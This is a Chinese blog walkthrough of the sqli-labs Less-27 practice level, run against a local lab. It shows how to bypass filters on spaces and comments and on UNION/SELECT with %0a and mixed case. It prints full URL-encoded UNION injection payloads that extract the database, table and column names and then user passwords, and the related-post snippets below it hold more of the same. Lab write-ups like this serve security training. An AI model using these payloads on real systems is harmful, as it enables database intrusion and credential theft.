sqli-less27过滤注入

最新推荐文章于 2022-07-13 16:45:37 发布
最新推荐文章于 2022-07-13 16:45:37 发布
阅读量273 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cqs394235616/article/details/106282120
版权

sqli-less27过滤注入

一、检查网站

127.0.0.1/sqli/less-27/?id=1'

在这里插入图片描述在这里插入图片描述1、可以发现空格被过滤了
空格的部分替换方法:/%0a/、%0a、%09

2、–+也被过滤了
可以选择封装代码:简单来说就是代码结尾加上 ,’
在这里插入图片描述

二、爆数据库名

编写思路:1、过滤部分(空格,–+,大小写)2、查询思路

?id=0%27%0aUNIon%0aSElect%0a1,database(),%27

在这里插入图片描述

三、爆表名

id=0%27%0aUNIon%0aSElect%0a1,(SELEct%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema='security'),%27

在这里插入图片描述

四、爆字段名

id=0%27%0aUNIon%0aSElect%0a1,(SElect%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_schema='security'%0aand%0atable_name='users'),'

在这里插入图片描述

五、爆数据

id=0%27%0aUNIon%0aSELect%0a1,(SELect%0agroup_concat(id,username,password)%0afrom%0asecurity.users),'

在这里插入图片描述

昨日青空705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入详解 23-28关
君莫hacker的博客
10-08 670
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
sqli-labs/Less-27
最新发布
m0_71299382的博客
11-20 381
sqli-labs第二十七关
SQL注入分析-less-27
qq_33505576的博客
02-18 1543
SQL注入分析-less-27 **1、 概述:**从本篇开始,后续都会写个概述,简单描述一下对题目的理解,本关的题目是 GET-Error Based-All your UNION&SELECT Belong to us-String-Single quote 中文名称,基于GET型的报错-构造属于你自己的UNION和SELECT-单引号字符型的注入,从名字上来看,这关需要通过报错信息来获取库名、表名、列名和对应字段(列)的数据,同时应该是对单引号敏感。 2、 尝试一下我们的猜想,按照提示,输入参
Sqli-labs之Less-27和Less-27a
m0_46315342的博客
06-04 287
                                          &nbs...
Sqlilabs-27
KAKA的博客
07-14 811
题目告诉我们本关卡过滤了 union 和 select,其实还有空格,这一关也过滤了 尝试双写绕过,不行 那就大小写绕过,成功 –查表 http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1 –查列 http://s.
SQL注入分析-Less-27a
qq_33505576的博客
02-19 307
SQL注入分析-Less-27a 1、 概述:此关的名称GET-Blind Based-All your UNION & SELECT Belong to us-Double Quotes,中文名称是基于GET型的盲注—构造你自己的union和select—双引号注入,从题目名称来看,推测这关是盲注,无法通过报错信息来获取所需要的数据,只能通过盲注的方式,这里我想的是通过布尔盲注的方式来获取信息,同时要通过技巧绕过UNION和SELECT查询语句,而且拼接过程中需要使用双引号进行闭合。 2、根据猜想
sqli-labs-less-27 大小写绕过waf
yzcn
12-14 506
Less-27 sql注入 WAF绕过相关笔记:点击此处less-25 首先按照提示使用id http://192.168.99.100/Less-27/?id=1 返回正常,有回显 http://192.168.99.100/Less-27/?id=1’ 出现报错 http://192.168.99.100/Less-27/?id=1’ ;%00 返回正常,绕过注释 判断字段数: http://192.168.99.100/Less-27/?id=1’ %a0 order %a0 by %a0
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
Less-27and27a
老司机开代码的博客
08-04 250
文章目录1. 思路分析2. 注入过程3. 27a 1. 思路分析 这一关表上上告诉你他只是过滤了union和select,其实不然。 function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $
Sqli-Labs做题笔记:Less-27 - Less-31
Forever_Han13的博客
01-24 1672
Less-27: http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00 Less-27a http://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_
SQLi-LABS Less-27到Less-28a
m0_64898960的博客
04-29 172
Less-27题目 经过测试发现需要“ ’ ”进行闭合… 尝试猜字段,发现除了空格和注释符,一些内容好像又可以用了,如or… 不能使用union和select 我们可以通过间接大小写来达到或者像union里面再塞一个union来达到绕过的效果… 开始爆数据库 这里使用了-1发现“ - ”好像被过滤了,改为100 下面的注入照常,只要注意一下union和select的输入即可 Less-27a题目 测试出闭合条件“ " ” 经过尝试,没有报错的回显…可以用题目说的盲注也可以大小写union和sel
SQLi Labs Lesson27 & Lesson27a
1ame的博客
08-23 428
Lesson - 27 GET - Error Based - All your UNION & SELECT Belong to us - String - Single Quotes 首先进入欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果如图所示: 由错误回显信息推测后台SQL语句结构: select ...
sqli-labs靶场练习Less-21~30(持续更新)--ch4nge
ch4nge
10-28 755
Less21-30 作者:ch4nge 目录Less21-30Less21·cookie·E·base64encode手注sqlmapLess 22·cookie·E·base64encode手注sqlmapLess 23·Less 24·二次注入 Less21·cookie·E·base64encode Base64encode之后注入 注入操作同20 登录框没有注入点 setcookie('uname', base64_encode($row1['username']), time()+3600);
(手工)【sqli-labs2727a】报错回显、布尔盲注、过滤注入
07-13 846
SQL-报错、布尔、过滤
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯关指南 26、26a、2727a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1299
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯关指南 26、26a、2727a、28、28a)—Advanced injection
sqli-labs (less-27 and less-27a)
kukudeshuo的博客
03-12 884
sqli-labs (less-27 and less-27a) less-27 进入27关,输入ID=1查看屏幕回显 直接查看源代码 发现在less-26的基础上过滤了UNION,SELECT,union,select,这里我们可以采取大小写混合过滤 确定回显位置 http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,3;%00 查看当前库 http://127.0.0.1/sql1/Less-27/?id=111
SQL注入 -过滤绕过
技术小白
09-25 1万+
版权声明:本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 许可协议。转载自 https://blog.csdn.net/wy_97/article/details/78085664 写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这...
sql一些技巧
zzx的博客
01-25 357
最近比较多事,很多地方都停滞不前,想来还是静下心来做些事比较好。 整理一些关于mysql的一些注入技巧,详细的可以到github里面看。里面 有完整的项目。 首先说来最基本的,大小写绕过,字符编码绕过,注释绕过,用||代替or,用&&代替and这些比较普遍的都是基本功,也就是说肯定是每个语句都要用到以上内容,这样可以省下很多时间, 而且,也不会有那么弱的网站对这些都不加以限制,所以这些算是起
i春秋web-SQLi(过滤逗号的注入--join注入技巧)
Sea_Sand息禅
05-21 2329
逗号被过滤之下需要一些注入技巧,本文为其中一种,另一种参考https://blog.csdn.net/zz_Caleb/article/details/88933173。 题目是SQLi,应该是个注入的题,进来之后直接就是b68a89d1c4a097a9d8631b3ac45e8979.php,一般应该是index.php的,这里可能是有一个重定向,看一下页面源码: 于是访问了login.php...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值